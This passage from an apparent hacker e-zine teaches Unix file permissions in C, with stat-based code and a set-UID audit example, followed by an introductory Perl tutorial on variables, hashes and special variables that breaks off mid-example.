      (find's -perm test does this) and asking, for each one, whether it really
      needs to be there.
      
      
      -----------[ file permissions in C
      
      Every single bit of information about a file is found inside a structure
      called an i-node. To get that information you can use the three following
      system calls:
      
       int stat(const char *path, struct stat *statb);
      
       int lstat(const char *path, struct stat *statb);
      
       int fstat(int fd, struct stat *statb);
      
      "stat" is the most commonly used syscall of the three. It gets the
      information on a file using the path and places it into the structure
      statb.
      
      The only difference between lstat and stat is that when the file is a symbolic 
      link stat would return information about the file to wherever the link happens 
      to point to. While lstat actually returns info about the link itself. 
      Fstat takes a fd to an open file and reads info about the file.
      
      The structure stat can be found in /usr/include/sys/stat.h and is defined
      as the following:
      struct stat
         {
              dev_t         st_dev;       /* device */
              ino_t         st_ino;       /* inode */
              mode_t        st_mode;      /* file type and permissions */
              nlink_t       st_nlink;     /* number of hard links */
              uid_t         st_uid;       /* user ID of the owner */
              gid_t         st_gid;       /* group id of the owner */
              dev_t         st_rdev;      /* device type (for device files) */
              off_t         st_size;      /* total size in bytes */
              blksize_t     st_blksize;   /* blocksize for filesystem I/O */
              blkcnt_t      st_blocks;    /* number of 512-byte blocks allocated */
              time_t        st_atime;     /* time of last access */
              time_t        st_mtime;     /* time of last modification */
              time_t        st_ctime;     /* time of last i-node change */
         };
      
      (The member order and the exact typedefs vary from system to system, and
      on current Linux the time fields are really struct timespec values behind
      a macro, so always access the members by name rather than by position.)
      
      st_dev: This is the major and minor device numbers of a device 
              on which the i-node associated with this file
              (and therefore the file itself) is stored.
      
      st_nlink: The number of links associated with a file. If a file has
                just been created, it has the value of '1'. This value is 
                incremented by 1 for every hard link that is made to
                the file.
      
      st_rdev: If the file is a character-special or block-special device
               then this field contains the major and the minor dev numbers
               of the file. (Unlike st_dev which has the major and minor
               dev numbers of the device on which the file is stored.)
      
      st_atime: The last time the file's contents were read (a read() or a
                mmap(); executing a program reads it too).
      
      st_mtime: The last time the file's contents changed: write(), truncate(),
                mknod()/creat(), or an explicit utime(). Changing the owner,
                group, link count or mode does NOT touch it.
      
      st_ctime: The last time the i-node changed. It is updated by everything
                that updates st_mtime and also by changes of i-node information 
                (owner, group, link count, mode, etc.). Unlike st_mtime it cannot
                be set with utime(), which makes it the more trustworthy of the
                two when you are looking for tampered files.
      
      st_blksize: A hint to programs about the best buffer size to use for
                  i/o operations on this file. 
      
      st_blocks: The total number of physical blocks that are actually allocated
                 on the disk for this file (so a sparse file shows far fewer
                 blocks than its st_size suggests).
      
      
      st_mode member of struct stat defines both the file type and its 
      permission bits. The following constants are used to determine the file type:
      
              S_IFMT: bitmask for the file type bitfields.
              S_IFREG: Regular file
              S_IFDIR: Directory
              S_IFCHR: Character device
              S_IFBLK: Block device
              S_IFLNK: Symbolic link
              S_IFIFO: FIFO file
              S_IFSOCK: socket
      
      There are also a set of POSIX macros to check the file type:
      
              S_ISREG:  regular file.
              S_ISDIR:  directory.
              S_ISCHR:  character device.
              S_ISBLK:  block device.
              S_ISLNK:  symbolic link.
              S_ISFIFO: FIFO type file.
              S_ISSOCK: socket.
      
      The next constants, will give you information about a files ownership, 
      permission values etc. 
      
              S_ISUID: User ID bit set.
              S_ISGID: Group ID bit set.
              S_ISVTX: Sticky bit set.
              S_IRWXU: The owner has read, write and execution permission.
              S_IRUSR: The owner has read perms for the file (same as S_IREAD).
              S_IWUSR: The owner has write perms for the file (same as S_IWRITE).
              S_IXUSR: The owner has execute perms for the file (same as S_IEXEC).
              S_IRWXG: The group has read, write and execution permission.
              S_IRGRP: The group has read perms for the file.
              S_IWGRP: The group has write perms for the file.
              S_IXGRP: The group has execute perms for the file.
              S_IROTH: Everyone has read perms for the file.
              S_IWOTH: Everyone has write perms for the file.
              S_IXOTH: Everyone has execute perms for the file.
      
       ----->cut here<-------->cut here<-------->cut here<-------->cut here<----
      <++> perms/mystat.c
      
       /*
          gcc mystat.c -o mystat
       */
      
      /* includes */
      #include <stdio.h>
      #include <stdlib.h>
      #include <string.h>
      #include <time.h>
      #include <sys/types.h>
      #include <sys/stat.h>
      #ifdef __linux__
      #include <sys/sysmacros.h>   /* major() and minor() live here on glibc */
      #endif
      
      /* prototypes */
      char *filetype(mode_t); 
      char *fileperms(mode_t);
      void statinfo(char *, struct stat *);
      
      void usage(char *prog)
      {
        printf("usage: %s file\n",prog);
        exit(-1); 
      }
      int main(int argc, char **argv)
      {
          struct stat st;
      
          if(argc != 2)usage(argv[0]);
      
          /* lstat, not stat: we want to see a symlink as a symlink */
          if(lstat(argv[1], &st) < 0) {
               perror(argv[1]);
               exit(-1);
          }
      
           statinfo(argv[1], &st);
      
           return 0;
        }
      
      void statinfo(char *filename, struct stat *st) {
      
        printf("File Name:\t%s\n", filename);
        printf("File Type:\t%s\n", filetype(st->st_mode));
      
        /* the stat fields have system-dependent typedefs, so cast them to a
           known width before handing them to printf */
        if(((st->st_mode & S_IFMT) != S_IFCHR) && ((st->st_mode & S_IFMT) != S_IFBLK)) {
             printf("File Size:\t%lld bytes,  %lld blocks\n",
                    (long long)st->st_size, (long long)st->st_blocks);
             printf("I/O Unit:\t%ld bytes\n", (long)st->st_blksize);
        }else{
             printf("Device Numbers:   Major: %u   Minor: %u\n",
                    (unsigned)major(st->st_rdev), (unsigned)minor(st->st_rdev));
        }
        printf("Permissions:\t%s(%04o)\n", fileperms(st->st_mode), (unsigned)(st->st_mode & 07777));
        printf("Inode Number:\t\t%llu\n", (unsigned long long)st->st_ino);
        printf("Owner Userid:\t\t%ld\n", (long)st->st_uid);
        printf("Owner Group-id:\t\t%ld\n", (long)st->st_gid);
        printf("Hard link count:\t%ld\n", (long)st->st_nlink);
        printf("File system device: Major: %u  Minor: %u\n",
               (unsigned)major(st->st_dev), (unsigned)minor(st->st_dev));
        printf("Last access:\t\t%s", ctime(&st->st_atime));
        printf("Last modification:\t%s", ctime(&st->st_mtime));
        printf("Last i-node change:\t%s", ctime(&st->st_ctime));
      }
      
      char *filetype(mode_t mode)
      {
         switch(mode & S_IFMT) {   /* mask off the permission bits first */
                  case S_IFREG:
                           return("regular file");
                  case S_IFDIR:
                           return("directory");
                  case S_IFCHR:
                           return("character device");
                  case S_IFBLK:
                           return("block device");
                  case S_IFLNK:
                           return("symbolic link");
                  case S_IFIFO:
                           return("fifo");
                  case S_IFSOCK:
                           return("socket");
          }
              return("unknown");   /* never hand NULL to printf("%s") */
      }
      
      /* build the 9-character rwxrwxrwx string ls -l shows. Each character has a
         fixed position, so index by position; advancing a pointer only when a
         bit is set would shift every later character. */
      char *fileperms(mode_t mode)
         {
            int i;
            static char perms[10];
      
            strcpy(perms, "---------");
      
            /* S_IRUSR>>3 is S_IRGRP, S_IRUSR>>6 is S_IROTH, and so on */
            for(i=0;i<3;i++) {
                 if(mode &(S_IRUSR>>i*3))
                   perms[i*3] = 'r';
      
                 if(mode &(S_IWUSR>>i*3))
                   perms[i*3+1] = 'w';
      
                 if(mode &(S_IXUSR>>i*3))
                   perms[i*3+2] = 'x';
               }
      
             /* ls uses a lowercase letter when execute is also set and an
                uppercase one when it is not */
             if((mode & S_ISUID))
                perms[2] = (mode & S_IXUSR) ? 's' : 'S';
      
             if((mode & S_ISGID))
                perms[5] = (mode & S_IXGRP) ? 's' : 'S';
      
             if((mode & S_ISVTX))
                perms[8] = (mode & S_IXOTH) ? 't' : 'T';
      
           return(perms);
      }
      <--> end of mystat.c
      
      -----------[ Changing file permissions in C
      
      If you need to change the file permissions, you can use this set of functions:
              int chmod(const char *path, mode_t mode);
              int fchmod(int fd, mode_t mode);
      For mode you can use the permission flags above (OR'd together) or an
      octal number. In C an octal literal is simply a number with a leading 0,
      so write 0444, not 444 (which is decimal and gives you garbage bits).
      Both return 0 on success and -1 on error with errno set. Prefer fchmod()
      on a descriptor you already hold when the file could be swapped out from
      under you between the check and the change, as explained above for stat().
      
      example:
         use chmod("/tmp/bla", 0444) to make /tmp/bla readable for everyone.
      
      To change ownership, you can use these system calls:
              int chown(const char *path, uid_t owner, gid_t group);
              int lchown(const char *path, uid_t owner, gid_t group);
              int fchown(int fd, uid_t owner, gid_t group);
      
      If owner/group is -1, the owner/group will remain the same as before.
      Note that chown() follows symbolic links while lchown() changes the link
      itself, that on most systems only root may give a file away to another
      owner, and that on Linux the set-UID and set-GID bits are cleared when an
      unprivileged user chowns or writes to such a file.
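      To tie the SUID warning and the stat/chmod calls together, here is an
      added example (my code, not lamagra's) of the kind of audit a sysadmin
      runs: walk a directory with lstat(), report every regular file that is
      set-UID, set-GID or world-writable, and strip those bits through an open
      descriptor with fstat()/fchmod() so the file can't be swapped for another
      one between the check and the change. The names audit_dir(),
      strip_dangerous_bits() and demo(), and the scratch directory it builds
      under /tmp, are assumptions of mine.

```c
/* Set-UID / world-writable audit with lstat() and fchmod(): added example,
 * not part of lamagra's mystat.c. Function and file names are assumed for
 * the demo. Compile: gcc -o suidaudit suidaudit.c */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <dirent.h>
#include <sys/types.h>
#include <sys/stat.h>

/* Bits that should never be set quietly on a regular file */
#define AUDIT_BITS (S_ISUID | S_ISGID | S_IWOTH)

/* Scan one directory (not recursive) and count regular files that are
 * set-UID, set-GID or world-writable, printing each hit. lstat() is used so a
 * symlink planted in the directory is seen as a link and skipped, not followed.
 * Returns the number of suspicious files, or -1 if the directory can't be read. */
int audit_dir(const char *dir)
{
    DIR *d = opendir(dir);
    struct dirent *de;
    int hits = 0;

    if (d == NULL)
        return -1;
    while ((de = readdir(d)) != NULL) {
        char path[4096];
        struct stat st;

        if (strcmp(de->d_name, ".") == 0 || strcmp(de->d_name, "..") == 0)
            continue;
        snprintf(path, sizeof path, "%s/%s", dir, de->d_name);
        if (lstat(path, &st) < 0 || !S_ISREG(st.st_mode))
            continue;
        if (st.st_mode & AUDIT_BITS) {
            printf("%s: mode %04o%s%s%s\n", path, (unsigned)(st.st_mode & 07777),
                   (st.st_mode & S_ISUID) ? " set-uid" : "",
                   (st.st_mode & S_ISGID) ? " set-gid" : "",
                   (st.st_mode & S_IWOTH) ? " world-writable" : "");
            hits++;
        }
    }
    closedir(d);
    return hits;
}

/* Remove the set-UID/set-GID/world-write bits from an open descriptor. Working
 * on the fd means the file can't be swapped for another path between the
 * fstat() check and the fchmod(). Returns 0 on success, -1 on error. */
int strip_dangerous_bits(int fd)
{
    struct stat st;
    if (fstat(fd, &st) < 0)
        return -1;
    if ((st.st_mode & AUDIT_BITS) == 0)
        return 0;                      /* nothing to do */
    return fchmod(fd, st.st_mode & 07777 & ~AUDIT_BITS);
}

/* Self-contained demo: build a scratch directory (constructed input) holding
 * one set-UID, world-writable file and one harmless file, audit it, clean it,
 * audit again. Returns the number of hits before cleaning (1) or -1 on failure. */
int demo(void)
{
    char dir[] = "/tmp/suidauditXXXXXX";   /* mkdtemp fills in the XXXXXX */
    char bad[4096], good[4096];
    int fd, before, after;

    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(bad, sizeof bad, "%s/suspicious", dir);
    snprintf(good, sizeof good, "%s/harmless", dir);

    fd = open(bad, O_WRONLY | O_CREAT | O_EXCL, 0644);
    if (fd < 0) return -1;
    fchmod(fd, 04757);                 /* rwsr-xrwx: the kind of mode to worry about */
    close(fd);
    fd = open(good, O_WRONLY | O_CREAT | O_EXCL, 0644);
    if (fd < 0) return -1;
    close(fd);

    before = audit_dir(dir);

    fd = open(bad, O_RDONLY);
    if (fd < 0) return -1;
    strip_dangerous_bits(fd);
    close(fd);
    after = audit_dir(dir);
    printf("suspicious files: %d before, %d after cleaning\n", before, after);

    unlink(bad); unlink(good); rmdir(dir);
    return (after == 0) ? before : -1;
}

int main(void)
{
    return demo() == 1 ? 0 : 1;
}
```

      Point audit_dir() at /usr/bin or /usr/local/bin on a real box and compare
      the list against what the vendor ships; anything you can't explain is
      worth a closer look before deciding whether to strip it.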
      
      -----------[ Ending
      
      I hope you learned something new, although file permissions are really basic.
      For the next edition of the e-zine, I'll write some more difficult guides.
      
      Like always if you any further questions, remarks or anything. 
      You can find me on IRC (irc.box5.net) in some channel.
      
      Until we meet again, lamagra out.
      
      ----[ EOF
              
      
                              An introduction to perl
                          =-=+=-=+=-=+=-=+=-=+=-=+=-=+=-=
      
      Perl: Volume 1
      
      
              Hello and welcome to the Perl section of the list. This is
      Darkmo0n, Im gonna be writing some Perl tutorials for the list. When we're
      all done you should know enough Perl to make almost anything ya want. So..
      lets get started already.. 
      
      WHAT IS PERL:
      
              Perl (Practical Extraction and Report Language) is an
      INTERPRETED language designed by Larry Wall in the late 80's as a tool to
      create reports from many files on the UNIX operating system. As we learn
      more and more Perl, you will notice that many of its functions have to do
      with managing files, and manipulating or searching strings or patterns. The
      fact that Perl is an interpreted language means that it does not need to
      be compiled or linked to be run; it is just a plain text file, like shell
      scripts. Unlike shell scripts, Perl offers the power and flexibility of
      high level languages like C, but does an excellent job of simplifying many
      tasks. For example, Perl internally handles all variable types. So the
      same variable can be used to hold strings, integers or other data types.
      And you can forget about malloc(), Perl handles all memory internally.
              As you'll see, Perl is extremely easy to learn, especially if you
      have any experience with other programming languages, heh imagine.. even
      *I* learned Perl.
      
      GETTING PERL:
      
              Alright, in order to learn Perl, you need to get yourself the
      interpreter. It comes packaged with most Linux distributions. 
      
      Check if you already have it:
      -----------------------------
      Dark@darkness Dark >$ perl -v
      
      This is perl, version 5.005_03 built for i386-linux
      
      Copyright 1987-1999, Larry Wall
      
      Perl may be copied only under the terms of either the Artistic License or
      the GNU General Public License, which may be found in the Perl 5.0 source
      kit.
      
      Complete documentation for Perl, including FAQ lists, should be found on
      this system using `man perl' or `perldoc perl'.  If you have access to the
      Internet, point your browser at http://www.perl.com/, the Perl Home Page.
      ---------------------------
      
      
      If you got a command not found, you can try other search utilities like
      whereis, locate, or find (Refer to the man pages if ya dont know how to
      use em). If you dont have Perl, run a search on freshmeat.net or another
      app finder to locate the latest version. 
      
              For you guys stuck in Win9x (I pity you, really. Get Linux for
      God's sake!), you can go to www.activestate.com to get a version of perl
      that will work for you. 
      
              NOTE: Not all commands that work *nix versions of Perl will work
      in the Win32 version (ex. getpwent(), and many of the file test
      functions). All perl scripts shown here are for the *nix version of perl. 
      
      
      PERL LESSON 1:
      
              OK, now that we have perl up and running, lets start learning
      already. Perl programs, like all high-level programming language's
      programs, are made up of statements. Like in C, every Perl statement ends
      in a ; (semicolon), and extra white space is ignored. For example, 
      
                      print "hello";
      
      is a valid Perl statement. 
      
              print 
                              "hello"
      
      
      
                                              ;
      
      is ALSO valid.
      
              print; "hello"
      
      NOT what you meant: Perl reads it as two statements, a print of the
      default variable $_ followed by a string constant that does nothing
      (perl -w warns "Useless use of a constant in void context").
      
              print "hello"
      
      INVALID (No semicolon) when another statement follows it; Perl only lets
      you drop the semicolon on the very last statement of a block or file.
      
      
      Now, lets do everyone's first program in ANY new language, Hello World.
      (NOTE: Line numbers are for reference only, dont type em in)
      
      
      1: #! /usr/bin/perl
      2: print "Hello, World!\n";
      
      Ok type that in in your favorite plain text editor (vi, notepad, pico
      whatever as long as it saves in plain text), and save it. To run a perl
      script in *NIX:
      
      Dark@darkness Dark >$ chmod +x hello.pl
      Dark@darkness Dark >$ ./hello.pl
      Hello, World!
      Dark@darkness Dark >$
      
      In Windows:
      
      C:\> perl hello.pl
      Hello, World!
      C:\>
      
      Alright, now lets take a look at the program....
      
      LINE 1: #! /usr/bin/perl
      
      That line contains the path to your Perl interpreter. It is what lets the
      shell run the file directly as ./hello.pl: without it the script would be
      handed to the shell instead of to perl (running it as "perl hello.pl"
      works either way). Also, if you want to run the interpreter with some
      command line options, you would include them there. For example, its good
      practice to run Perl with the -w switch, which turns on warnings in the
      script, which aids in debugging. To use the -w, change line 1 to:
      
      #! /usr/bin/perl -w 
      
      LINE 2: print "Hello, World!\n";
      
      There's our first Perl statement, a print command. The syntax for print
      (for now) is:
      
              print "STRING";
      
              Prints STRING to STDOUT.
      
      \n is known as an escape sequence. If your'e familiar with C, you know
      that \n represents a New line character, signals the end of a line of text
      on the screen. There are several legal escape sequences in Perl, here are
      the more widely used ones:
      
              \a : Alarm (*beep*)
              \t : Tab
              \n : New line
              \r : Carriage Return
              \0xx : ASCII code for a character in Octal notation
              \xXX : ASCII code for a character in Hex.
      
      There are a few other common ones, but those will be covered when we do
      Regular Expressions and Patterns. 
      
      Comments in Perl are created by the #, pound sign. When a # is reached, the rest of the
      line is skipped. Notice the # on the first line of all Perl programs: to the
      interpreter it looks like a comment (apart from switches such as -w, which
      perl does pick up from that line). The path itself is for the shell/operating
      system's use only. 
      
      #! /usr/bin/perl
      
      # print "This line wont execute\n";
      
      $scalar = "adfas"; # this is a partial line comment
      
      
      Perl: Volume 2 - Variables & Operators
      
              Traditionally, the second lesson in any programming language is
      variables and data storage. Today, we will explore the 3 Perl variable
      types: Arrays, Scalars, and Hashes (No, there will be no pot in the hash
      section). After we cover the data types, we will also discuss many of the
      simple operators Perl has to offer. After this lesson, you will know
      enough to make your own simple Perl programs. 
      
      NOTE: A solid command of these topics is REQUIRED to become a good Perl
      programmer, ESPECIALLY the section on arrays and hashes, since these are
      the main components of any complex data structure you will be creating in
      Perl. 
      
      ANOTHER NOTE: This volume is LONG (19 kb, four times more than the last
      one.), it took me three days to write it all. I recommend that you read
      the Variable section first, take a break, and then continue on the
      operators. If you attempt to read this all in one sitting, you are either
      really bored, or have a LOT of free time on your hands.
      
      FINAL NOTE BEFORE WE BEGIN: There are plenty of examples in this one, be
      sure to take a look at all of them and understand why they act the way
      they do. This will help you prevent many annoying bugs in your future
      programs. (For each of the examples I included, I have made those mistakes
      in the past with similar code, I included them so you wont have to.)
      
      ------------------------------------------------------------------------
      
      PERL VARIABLES:
      
              Perl has 3 different kinds of variables: Scalars, Arrays and
      Hashes. Each of these can be used to hold numbers, integers, floating
      point numbers, characters, strings etc. People familiar in C will find
      this quite different from what they are used to: there are no variable
      "type". For example, a scalar can be first used to hold a number, and
      later, without any modification, can be reassigned to a string. 
      
              To learn about the variable types, we need to know how to set
      them.
      
      The = Operator:
      
              The = operator assigns the value on the right to the variable on
      the left. 
              In Perl, a scalar variable ALWAYS begins with a $ (dollar sign),
      array variables ALWAYS begin with a @ (an "at" sign) and hashes ALWAYS
      begin with a % (percent sign).
              Strings should always be in double quotes ("") or single quotes (''),
      since back quotes (``) have a special meaning in Perl: they run what is
      between them as a shell command and hand you its output (that will be
      covered later; never put user input inside them). Numeric values dont need
      to be quoted.
      
      -------------------------------------
      NOTE:
              Variables in Perl are CASE SENSITIVE. $scalar, $SCALAR, and
      $ScALAR are *DIFFERENT* variables. Personally, I put variables that hold
      more permanent settings in all caps, and all regular variables in
      lowercase.
      
      NOTE:
              Also, variable names in Perl must be all alphanumeric characters
      (0-9, a-z, A-Z, _). The first letter in the variable name can't be a _. For
      example:
      
      $address LEGAL
      $new! NOT LEGAL
      $_temp NOT LEGAL
      
              Variables that contain non-alphanumeric characters are set
      internally by Perl, such as $_, $<, $>, $| and $#array.
      
      LAST NOTE: Perl uses different variable space for each type of variable.
      You can have a scalar named $temp and an array named @temp defined at the
      same time: they won't interfere with each other.
      -------------------------------------
      
      
      SCALARS: These variables hold single values or strings. For example:
      
      <++> perl/scalars.pl
      #! /usr/bin/perl -w
      
      $scalar = "This is a scalar variable:";
      $scalar2 = 3.1415926;
      print "$scalar $scalar2\n";
      <--> end scalars.pl
      
      OUTPUT: 
      
      Dark@darkness work >$ chmod +x scalars.pl
      Dark@darkness work >$ ./scalars.pl
      This is a scalar variable: 3.1415926
      Dark@darkness work >$
      
      
      ARRAYS: These variables hold more than one value, and are indexed by
      numbers. NOTE: Array subscripts start counting, by default, at the number
      0, like in many other languages. If you aren't used to counting up from 0,
      you can change this by setting the special $[ scalar to the value you want
      to count from. Special variables, such as $[, $_, and others, will be
      discussed in detail in another volume.
      
      For example:
      
      <++> perl/arrays.pl
      #! /usr/bin/perl
      
      @array = (2, 3, 4, "data", 34.023, "Im a 3l33t Perl h4x0r");
      
      print "$array[0]\n\n";
      print "$array[5]\n";
      
      <--> end arrays.pl
      
      OUTPUT:
      
      Dark@darkness Dark >$ chmod +x arrays.pl
      Dark@darkness Dark >$ ./arrays.pl
      2
      
      Im a 3l33t Perl h4x0r
      Dark@darkness Dark >$
      
      Some of the more observant among you might be asking "Why the hell is
      there a $ in front of the array name, if it's not a scalar??". This is a
      point of confusion to many people beginning in Perl. When you refer to the
      ENTIRE array, it is prefixed with a @. When you refer to individual
      elements of the array, it is prefixed with a $.
      You can assign values to members of an array like:
      
      $array[100] = "This is a string"; 
      
      Or you can assign the whole array at once using a LIST. Let's look at the
      declaration of @array in the previous example:
      
      @array = (2, 3, 4, "data", 34.023, "Im a 3l33t Perl h4x0r");
      
      This array is declared by a list. Lists are simply one or more values
      separated by commas. Some Perl docs you may read refer to strings as
      lists with only one member, which is also correct.
      
      
      HASHES: Now everyone's favorite variable type, the hash. Hashes are
      the most powerful data types in Perl. Their use might not be apparent
      right away, but when you start programming more complicated programs, their
      existence will make your life SO much easier. A hash is exactly like an
      array, just that its values are indexed by strings, not numbers.
      
      <++> perl/hash.pl 
      
      #! /usr/bin/perl
      
      %hash = ("RED", 0xFF0000, "GREEN", 0x00FF00, "BLUE", 0x0000FF);
      
      print "Red is: $hash{'RED'} in RGB\n";
      print "Green is: $hash{'GREEN'} in RGB\n";
      print "Blue is: $hash{'BLUE'} in RGB\n";
      
      <--> end hash.pl 
      
      OUTPUT:
      
      Dark@darkness Dark >$ chmod +x hash.pl
      Dark@darkness Dark >$ ./hash.pl
      Red is: 16711680 in RGB
      Green is: 65280 in RGB
      Blue is: 255 in RGB
      Dark@darkness Dark >$
      
      Hrmm.. something didn't go as planned.. in the hash declaration, we put
      0xFF0000 as RED, but the print function printed a "16711680". Why? In our
      declaration, 0xFF0000 was not quoted. Since it is a valid integer in hex,
      Perl changed it to decimal and then stored it into the hash. Then it was
      printed to stdout by print. How do we change this? In the declaration,
      quote the value for RED. This forces Perl to interpret it as a string, and
      does not do the conversion.
      
      OUTPUT:
      
      Dark@darkness Dark >$ ./hash.pl
      Red is: 0xFF0000 in RGB
      Green is: 0x00FF00 in RGB
      Blue is: 0x0000FF in RGB
      Dark@darkness Dark >$
      
      Earlier we used the hex values in "numeric context," meaning that they were
      interpreted as numbers. The second time, they were used in string, or scalar,
      context, meaning that they were interpreted as strings. The same values used
      in different contexts can have very different results. Here is another
      example using arrays:
      
      <++> perl/context.pl
      #! /usr/bin/perl
      
      @array = (23, 156, "this is an array");
      
      $scalar = @array;
      $scalar2 = "@array";
      
      print "$scalar\n";
      print "$scalar2\n";
      print "@array\n";
      print "$array[0] $array[1] $array[2]\n";
      <--> end context.pl
      
      OUTPUT:
      
      Dark@darkness Dark >$ chmod +x context.pl
      Dark@darkness Dark >$ ./context.pl
      3
      23 156 this is an array
      23 156 this is an array
      23 156 this is an array
      Dark@darkness Dark >$
      
      Hrm.. that's strange.. we referred to the same array in different ways, but
      the first line looks different. Why? Let's look at how we use the
      variable..
      
      $scalar = @array;
      ...
      print "$scalar\n";
      
      Here, we use @array in numeric context.. and set that value to $scalar.
      When an array name is used in numeric context, it returns the NUMBER OF
      MEMBERS OF THE ARRAY. THIS IS *NOT* THE SUBSCRIPT OF THE LAST ARRAY VALUE.
      The subscript of the last array value is @array - 1, and can also be
      obtained as $#array, a variable set internally by Perl that holds the
      subscript of the last array member. Ex: $members[$#members] returns the
      last member of array @members. The $#array variable can be increased or
      decreased like any other variable, but changing its value ALSO CHANGES THE
      SIZE OF THE ARRAY. For example:
      
      <++> perl/chsize.pl
      #! /usr/bin/perl
      
      @array = ("one", "two", "three");
      $#array--;
      print "@array\n";
      
      <--> end chsize.pl
      
      OUTPUT:
      
      Dark@darkness Dark >$ chmod +x chsize.pl
      Dark@darkness Dark >$ ./chsize.pl
      one two
      Dark@darkness Dark >$
      
      Notice that the last member of the array is gone, since the array size was
      decreased. 
      
      FUNCTIONS THAT ACT ON VARIABLES:
      
      Ok, now back to hashes.. Many of you might not immediately notice the
      importance of hashes, but let's explore them a bit more. We know that
      hashes are indexed by strings, and we also know that scalars and arrays
      can hold strings... so we can do some nice stuff: things like
      $hash{"$scalar"} return the hash value indexed with the key given by the
      contents of $scalar.
      
      If we use this convention, we might also need to know which keys exist in
      the hash. This is accomplished by the keys() call. 
      
      SYNTAX: keys(%hash)
              Returns a list of all keys in %hash
      
      for example we can:
      
      @array = keys(%hash);
      
      and then loop through the members of @array, to find all the values in the
      hash. We can also determine whether a key exists in a hash, with the
      exists() call.
      
      SYNTAX: exists($hash{"key"})
              Returns true if key exists in %hash, false otherwise. This is
      commonly used in conditional statements. 
      
      and we can also delete a key from a hash using, you guessed it, the
      delete() call. 
      
      SYNTAX: delete($hash{"key"})
              Deletes key from %hash. After this is done, the value at that key
      will be also lost. 
      
      Scalars and arrays also have the same type of commands:
      
      SYNTAX: defined($scalar), defined(@array);
              Returns true if $scalar or @array exists, false otherwise. Also
      used in conditionals.
      
      SYNTAX: undef($scalar), undef(@array);
              Undefines $scalar or @array. Contents of each will be lost. Undef
      is also used with many Perl functions that return lists. For example:
      
      (undef, $file) = split(/=/, $scalar, 2);
      
      This split call returns a two member list of values. If we only want the
      second one, we can throw the first away by assigning it to undef, while
      keeping the second. Split will be covered later when we discuss regular
      expressions and string manipulation.
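      The hash calls and the undef trick from above, put to work in one
      script. This is an added example, not code from the tutorial; the
      contents of %port_of are made up for the demonstration:

```perl
#!/usr/bin/perl
# Added example, not part of the original tutorial: keys(), exists(),
# delete(), defined()/undef and list assignment with undef, all on one
# small hash. The hash contents are made up for the demonstration.
use strict;
use warnings;

my %port_of = ("ftp", 21, "ssh", 22, "telnet", 23, "http", 80);

# keys() returns the key list in no particular order, so sort it for
# stable output.
foreach my $service (sort keys %port_of) {
    print "$service => $port_of{$service}\n";
}

# A scalar can be used as the key, exactly as $hash{"$scalar"} in the text.
my $wanted = "telnet";
if (exists $port_of{$wanted}) {
    print "$wanted is listed on port $port_of{$wanted}\n";
}

# delete() removes both the key and its value.
delete $port_of{"telnet"};
print "telnet is ", (exists $port_of{"telnet"} ? "still" : "no longer"),
      " in the hash\n";

# A key can exist while its value is undefined: exists() and defined()
# answer different questions.
$port_of{"finger"} = undef;
print "finger exists:  ", (exists  $port_of{"finger"} ? "yes" : "no"), "\n";
print "finger defined: ", (defined $port_of{"finger"} ? "yes" : "no"), "\n";

# undef on the left side of a list assignment throws that element away.
my (undef, $value) = split(/=/, "key=value", 2);
print "kept only: $value\n";

# undef() on a whole array drops its contents; in numeric context the
# array then counts 0 members.
my @services = keys %port_of;
print "have ", scalar(@services), " keys\n";
undef @services;
print "have ", scalar(@services), " keys after undef\n";
```

      Note that the script uses "use strict" and "my" declarations, which the
      tutorial has not introduced yet; they make Perl complain about typos in
      variable names instead of silently creating a new variable.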
      
      SYNTAX: $scalar = join("string", @array);
              Converts an array into a single string, by joining all the members
      of the array, separating them by "string". For example:
      
      <++> perl/join.pl
      #! /usr/bin/perl
      @array = ("a", "random", "array", "of", "values", 23);
      $scalar = join("::", @array);
      print "$scalar\n";
      <--> end join.pl
      
      OUTPUT:
      
      Dark@darkness Dark >$ ./join.pl
      a::random::array::of::values::23
      Dark@darkness Dark >$
      
              This function is mainly used to concatenate a whole array into a
      scalar, for example to later print it to some sort of configuration file.
      Say you have an array returned by getpwent(): join it to recreate the
      /etc/passwd entry.
      
      SPECIAL VARIABLES:
      
              Perl has a LOT of special system variables which are
      automatically set at runtime. These variables control many aspects of the
      program, and also give the program access to operating system data.
      
      @ARGV : Command line arguments
              Like in many other languages, the @ARGV array holds the arguments
      given after the program name at the command line. Unlike in C, $ARGV[0]
      does NOT hold the program name, it holds the first argument after the
      program name. The name of the program is held in the special variable $0.
      
      <++> perl/argv.pl
      #! /usr/bin/perl
      
      print "$0 @ARGV\n";
      <--> end argv.pl
      
      OUTPUT:
      
      Dark@darkness Dark >$ ./argv.pl this is a test
      ./argv.pl this is a test
      Dark@darkness Dark >$
      
      %ENV : Environment Variables
              This hash holds the names and values of all environment variables
      currently set. For example: $ENV{"PATH"} will return the contents of your
      PATH environment variable. Like any other hash, you can set new values in
      this one.
      
      $ENV{"TESTER"} = "blah";
      
      This code fragment sets a new environment variable named TESTER to the
      string "blah". The delete(), and exists() functions can also be used on
      this hash.
      
      %SIG : Signals
      
              This hash is Perl's frontend for signal trapping. In later volumes,
      we will use references and this hash to create an unkillable process, and
      timeout counters.
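      As an added example (not part of the tutorial), %ENV and %SIG in use:
      %ENV is read and written like any other hash, and a $SIG{ALRM} handler
      together with alarm() gives a blocking read a time limit, which is the
      timeout counter the text mentions. It assumes a Unix system with a
      printenv command:

```perl
#!/usr/bin/perl
# Added example, not part of the original tutorial: %ENV and %SIG in use.
# The timeout below is the "timeout counter" the text promises for a later
# volume, built from $SIG{ALRM} and alarm(). It assumes a Unix system with
# a printenv command.
use strict;
use warnings;

$| = 1;    # unbuffer STDOUT so prompts appear before we block in <STDIN>

# %ENV is an ordinary hash: check with exists() first, because a variable
# that is not set gives undef, not an empty string.
foreach my $name (qw(PATH HOME NO_SUCH_VARIABLE)) {
    if (exists $ENV{$name}) {
        print "$name is set to $ENV{$name}\n";
    } else {
        print "$name is not set\n";
    }
}

# Assigning to %ENV changes the environment that child processes inherit.
$ENV{"TESTER"} = "blah";
print "child process sees TESTER=", `printenv TESTER`;

# %SIG maps a signal name to a handler sub. A handler that dies turns the
# signal into an exception, so eval can catch it. That is how a read that
# might never complete is given a time limit.
sub read_line_with_timeout {
    my ($seconds) = @_;
    my $line;
    eval {
        local $SIG{ALRM} = sub { die "timeout\n" };   # "\n" keeps the message clean
        alarm $seconds;                                 # deliver SIGALRM in $seconds
        $line = <STDIN>;
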